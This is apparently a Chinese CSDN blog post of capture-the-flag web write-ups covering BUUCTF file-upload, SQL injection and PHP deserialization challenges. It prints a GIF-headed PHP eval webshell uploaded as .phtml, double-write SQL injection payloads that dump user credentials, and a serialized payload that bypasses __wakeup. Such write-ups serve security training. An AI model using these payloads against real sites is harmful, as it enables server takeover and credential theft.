BUUCTF-web新手进阶(二)

于 2024-03-06 19:21:24 发布
阅读量421 收藏 6
点赞数 12
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwyyyxxxx/article/details/136507247
版权
文章描述了2019年极客大挑战中的几个技术环节,包括文件上传安全、SQL注入技巧(如绕过过滤和双写法)、PHP反序列化题目(利用备份文件和__wakeup魔术方法)。参与者通过蚁剑工具进行操作,涉及到了数据库查询和敏感信息获取。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]Upload

先随便上传个图片马试试

不让有<?那就换成js标签形式的

GIF89a    //jpg图片的文件头

<script language="php">eval($_POST[1]);</script>

上传成功了,但是没有显示路径,一般上传路径都是相对路径upload/或者uoloads/,这里访问upload/1.jpg成功,将1.jpg改成1.phtml,上传成功用蚁剑连接

[ACTF2020 新生赛]Upload

随便传个图片马,显示路径了,

 和上题一样的方法,传.phtml文件名,连蚁剑

[极客大挑战 2019]BabySQL

万能密码1'or 1='1报错了1=’1‘有语法错误,应该是or被过滤了,双写绕过

username=admin&password=1'oorr 1='1

然后就是常规sql注入流程,by也被过滤,一样双写,查到4报错,那就是三个字段

username=admin&password=1'oorrder+bbyy+4#

 

查响应

username=admin&password=1'ununionion seselectlect 1,2,3#

查表

username=admin&password=1'ununionion seselectlect 1,2,group_concat(table_name)frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

 查列名

username=admin&password=1'ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

最后

username=admin&password=1'ununionion seselectlect 1,2,group_concat(id,username,passwoorrd)frfromom b4bsl#

[极客大挑战 2019]PHP

这是一个反序列化的题

提示有备份文件的习惯,那就是说有源码的备份文件,访问www.zip得到源码

常用备份文件名
index.phps
index.php.swp
index.phps
www.zip

index.php接受select参数并反序列化

解题的关键是绕过__wakeup()魔术方法

__wakeup()在unserialize()之前执行,当表示属性数量的值大于真实属性数量,造成绕过wakeup
O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}    //这是正常字符串
O:4:"Name":3:{s:8:"username";s:5:"admin";s:8:"password";i:100;}    //类名后面的2改成3,由于只提供了两个属性,造成绕过__wakeup()

因为private序列化会产生不可见字符,最好将序列化字符串进行url编码再输出 

select=O%3a4%3a%22Name%22%3a3%3a%7bs%3a14%3a%22%00Name%00username%22%3bs%3a5%3a%22admin%22%3bs%3a14%3a%22%00Name%00password%22%3bi%3a100%3b%7d

@Wyx
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF web(一)
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1227
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF-web新手进阶(一)
wwwyyyxxxx的博客
03-05 624
万能密码:1'or 1=1#,有两个字段,省去了order by试试union select 1,2#select和where被过滤了,联合查询行不通只能试试堆叠查询-1';因为select被过滤了,所以就算堆叠查询也不能直接查flag,这里的操作是先改列名,再改表名,z最后利用题目自身的select查flag注意:这里一顿操作必须在同一次进行,否则题目select报错就终止了以后的语句,只能重开再次用万能密码就能查到flag。
BUUCTF-菜刀666
qq_44005305的博客
03-02 1013
题目:使用wireshark打开数据流:看题目就知道应该是一个菜刀的流量,也就是HTTP流量。
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
1ncrd#Study-Record#BUUCTF[第web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8389
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
层次聚类算法详解及Python实现.md
08-16
层次聚类算法是一种重要的无监督学习方法,用于将数据点分组为层次结构中的簇,以便发现数据中的自然聚集模式。其基本思想是通过构建树状图(Dendrogram)来逐步合并(凝聚型聚类)或分裂(分裂型聚类)数据点,从而形成层次结构。层次聚类可以分为自底向上和自顶向下两种策略。自底向上的凝聚型聚类从每个数据点作为独立的簇开始,逐步合并最相似的簇,直到所有数据点都属于一个簇;而自顶向下的分裂型聚类则从一个整体簇开始,逐步分裂成多个子簇,直到达到预定的簇数。层次聚类的距离度量包括欧氏距离、曼哈顿距离等,而链接方法则有单链接、完全链接、平均链接和质心链接等。 层次聚类的优点在于能够生成数据的多层次结构,直观展示数据的聚类过程,无需事先设定簇数。然而,其计算复杂度较高,尤其在处理大规模数据集时较为缓慢,同时对噪声和离群点较为敏感。层次聚类适用于中小规模的数据集,并且在市场分析、图像处理、基因组数据分析等领域具有广泛的应用。 在Python中,SciPy库提供了实现层次聚类和绘制树状图的功能,而Scikit-learn库则提供了高效的层次聚类实现。具体实现过程中,可以使用`linkage`函数进行层次
用于演示Nop平台基本开发流程的示例工程 功能设计与数据结构设计仿照开源的litemall项目
08-16
用于演示Nop平台基本开发流程的示例工程。功能设计与数据结构设计仿照开源的litemall项目。
VB+access教师考核管理系统(系统+论文+答辩PPT+摘要).zip
最新发布
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
基于Android手机防火墙APP设计与实现.docx
08-16
基于Android手机防火墙APP设计与实现.docx
HC小区物业管理系统包含收费+报表,报修,门禁道闸,线上缴费,社区商圈,巡检,公众号欠费推送和公告微信推送功能
08-16
HC小区物业管理系统包含收费+报表,报修,门禁道闸,线上缴费,社区商圈,巡检,公众号欠费推送和公告微信推送功能,目前系统已经在安徽宿州4个小区, 深圳2个小区,西安11个小区,山东5个小区和哈尔滨1个小区等商业化运营平稳
python调用edge-tts处理文本转语音
08-16
本项目是一个文本转语音 (Text-to-Speech, TTS) 的 Web 服务,用户可以通过发送 HTTP 请求来指定文本内容、输出文件名及发音人的声音类型。服务端接收到请求后,利用 edge-tts 命令行工具将文本转换为语音文件,并将生成的语音文件上传至腾讯云 COS 存储桶中。此外,服务还支持将语音文件保存在本地,并通过 HTTP 提供访问。 技术栈 Flask: 一个轻量级的 Python Web 框架,用于构建 RESTful API 和 Web 应用程序。 Flask-CORS: 一个 Flask 扩展,用于添加跨源资源共享 (CORS) 头部到响应,使前端应用能够跨域访问后端 API。 Qcloud COS SDK for Python: 腾讯云提供的 Python SDK,用于与 COS 服务交互,实现文件的上传和下载。 edge-tts: 用于将文本转换为语音。它利用了 Microsoft Azure 的 TTS 服务。
AI在材料领域的应用.pptx
08-16
AI在材料领域的应用.pptx
毕业设计asp.net安全电子投票系统-qkrp源码含文档工具包
08-16
毕业设计asp.net安全电子投票系统-qkrp源码含文档工具包 asp.net,数据库sqlserver,开发工具用Microsoft Visual Studio 系统用户管理 个人资料管理 投票标题管理 添加投票标题 投票标题管理 投票选项管理 留言管理 包含:源码、数据库脚本、论文、环境工具包(在说明文档中)
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
文章提到了几种可能导致变量覆盖的常见场景,包括全局变量覆盖、extract()函数、遍历初始化变量、import_request_variables以及parse_str()函数的不恰当使用。此外,还介绍了如何利用变量覆盖漏洞,并通过一个具体的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值